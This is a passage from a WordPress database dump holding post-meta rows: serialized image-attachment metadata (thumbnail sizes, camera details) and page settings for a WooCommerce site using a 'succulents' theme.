:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12389,5000,'_wp_attached_file','2020/04/IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x.jpg'),(12390,5000,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:588;s:4:\"file\";s:72:\"2020/04/IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:72:\"IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:72:\"IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:72:\"IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:72:\"IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:72:\"IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:72:\"IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:72:\"IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:72:\"IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:72:\"IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:72:\"IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:72:\"IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x-550x588.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:72:\"IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:72:\"IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:72:\"IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1401808534\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12391,5001,'_wp_attached_file','2020/04/IMG_2571_grande_f118c792-553d-4732-98c1-932f2271a7c2_880x.jpg'),(12392,5001,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:69:\"2020/04/IMG_2571_grande_f118c792-553d-4732-98c1-932f2271a7c2_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:69:\"IMG_2571_grande_f118c792-553d-4732-98c1-932f2271a7c2_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:69:\"IMG_2571_grande_f118c792-553d-4732-98c1-932f2271a7c2_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:69:\"IMG_2571_grande_f118c792-553d-4732-98c1-932f2271a7c2_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:69:\"IMG_2571_grande_f118c792-553d-4732-98c1-932f2271a7c2_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:69:\"IMG_2571_grande_f118c792-553d-4732-98c1-932f2271a7c2_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:69:\"IMG_2571_grande_f118c792-553d-4732-98c1-932f2271a7c2_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:69:\"IMG_2571_grande_f118c792-553d-4732-98c1-932f2271a7c2_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:69:\"IMG_2571_grande_f118c792-553d-4732-98c1-932f2271a7c2_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:69:\"IMG_2571_grande_f118c792-553d-4732-98c1-932f2271a7c2_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:69:\"IMG_2571_grande_f118c792-553d-4732-98c1-932f2271a7c2_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12395,4828,'_thumbnail_id','5000'),(12400,4831,'_thumbnail_id','5001'),(12405,4827,'_thumbnail_id','4999'),(12408,5002,'_wp_attached_file','2020/04/Logo-New-TR-web-1.jpg'),(12409,5002,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1223;s:6:\"height\";i:360;s:4:\"file\";s:29:\"2020/04/Logo-New-TR-web-1.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"Logo-New-TR-web-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-1-600x177.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Logo-New-TR-web-1-300x88.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Logo-New-TR-web-1-1024x301.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-1-768x226.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-1-550x360.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"Logo-New-TR-web-1-1100x360.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-1-550x360.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"Logo-New-TR-web-1-1100x360.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"Logo-New-TR-web-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-1-600x177.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"Logo-New-TR-web-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12410,5003,'_edit_last','1'),(12411,5003,'qodef_page_content_behind_header_meta','no'),(12412,5003,'qodef_boxed_background_image_attachment_meta','fixed'),(12413,5003,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(12414,5003,'qodef_portfolio_masonry_original_dimensions_meta','default'),(12415,5003,'portfolio_single_back_to_link','50'),(12416,5003,'qodef_disable_vertical_header_background_image_meta','no'),(12417,5003,'qodef_disable_header_widget_logo_area_meta','no'),(12418,5003,'qodef_disable_header_widget_menu_area_meta','no'),(12419,5003,'slide_template',''),(12420,5003,'rs_page_bg_color',''),(12421,5003,'_edit_lock','1586261199:1'),(12422,1553,'_edit_lock','1586261506:1'),(12423,2746,'_edit_lock','1586261935:1'),(12424,2746,'portfolio_single_masonry_image_size',''),(12425,2746,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12426,2746,'_edit_last','1'),(12427,2746,'_wp_page_template','default'),(12428,2745,'_wp_old_slug','logo-divided-img-1'),(12429,2745,'_edit_lock','1586432132:1'),(12430,2745,'portfolio_single_masonry_image_size',''),(12431,2745,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12432,2745,'_edit_last','1'),(12433,2745,'_wp_page_template','default'),(12434,2763,'_edit_lock','1586691918:1'),(12435,3309,'_edit_lock','1586262473:1'),(12436,3943,'_edit_lock','1586264033:1'),(12437,3943,'_wp_old_slug','recipe-img-1'),(12438,3943,'portfolio_single_masonry_image_size',''),(12439,3943,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12440,3943,'_edit_last','1'),(12441,3943,'_wp_page_template','default'),(12442,3941,'_wp_old_slug','recipe-img-2-2'),(12443,3941,'_edit_lock','1586264197:1'),(12444,3941,'portfolio_single_masonry_image_size',''),(12445,3941,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12446,3941,'_edit_last','1'),(12447,3941,'_wp_page_template','default'),(12448,3943,'_wp_old_slug','fish-1300x1943-1'),(12449,3941,'_wp_old_slug','drink-ornage-new-website-2'),(12450,4261,'_wp_old_slug','recipe-img-4-2-3'),(12451,4261,'_edit_lock','1586266267:1'),(12452,4261,'portfolio_single_masonry_image_size',''),(12453,4261,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12454,4261,'_edit_last','1'),(12455,4261,'_wp_page_template','default'),(12456,3935,'_wp_old_slug','recipe-img-4-2-2'),(12457,3935,'_edit_lock','1586277651:1'),(12458,3935,'portfolio_single_masonry_image_size',''),(12459,3935,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12460,3935,'_edit_last','1'),(12461,3935,'_wp_page_template','default'),(12462,1117,'_edit_lock','1692896805:1'),(12463,1117,'_edit_last','1'),(12464,1117,'rs_page_bg_color','#ffffff'),(12465,5006,'_wp_attached_file','2020/04/carrot-1943-x1300.jpg'),(12466,5006,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1943;s:4:\"file\";s:29:\"2020/04/carrot-1943-x1300.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"carrot-1943-x1300-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"carrot-1943-x1300-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"carrot-1943-x1300-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"carrot-1943-x1300-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"carrot-1943-x1300-685x1024.jpg\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"carrot-1943-x1300-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"carrot-1943-x1300-768x1148.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"carrot-1943-x1300-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"carrot-1943-x1300-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:31:\"carrot-1943-x1300-1028x1536.jpg\";s:5:\"width\";i:1028;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"carrot-1943-x1300-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"carrot-1943-x1300-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"carrot-1943-x1300-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:31:\"carrot-1943-x1300-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"carrot-1943-x1300-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"carrot-1943-x1300-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"carrot-1943-x1300-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1502926128\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12467,5007,'_wp_attached_file','2020/04/drink-ornage-new-website.jpg'),(12468,5007,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:420;s:6:\"height\";i:630;s:4:\"file\";s:36:\"2020/04/drink-ornage-new-website.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"drink-ornage-new-website-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"drink-ornage-new-website-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"drink-ornage-new-website-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"drink-ornage-new-website-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"drink-ornage-new-website-420x300.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"drink-ornage-new-website-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:36:\"drink-ornage-new-website-420x550.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:36:\"drink-ornage-new-website-420x550.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"drink-ornage-new-website-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"drink-ornage-new-website-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480761825\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12469,5008,'_wp_attached_file','2020/04/fish-1300x1943-1.jpg'),(12470,5008,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1943;s:4:\"file\";s:28:\"2020/04/fish-1300x1943-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"fish-1300x1943-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"fish-1300x1943-1-685x1024.jpg\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"fish-1300x1943-1-768x1148.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:30:\"fish-1300x1943-1-1028x1536.jpg\";s:5:\"width\";i:1028;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"fish-1300x1943-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"fish-1300x1943-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"fish-1300x1943-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"fish-1300x1943-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"fish-1300x1943-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1540365787\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12471,5009,'_wp_attached_file','2020/04/green-yellow-flavoured-water-NW.jpg'),(12472,5009,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:620;s:6:\"height\";i:930;s:4:\"file\";s:43:\"2020/04/green-yellow-flavoured-water-NW.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:43:\"green-yellow-flavoured-water-NW-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:43:\"green-yellow-flavoured-water-NW-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:43:\"green-yellow-flavoured-water-NW-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"green-yellow-flavoured-water-NW-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"green-yellow-flavoured-water-NW-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:43:\"green-yellow-flavoured-water-NW-620x300.jpg\";s:5:\"width\";i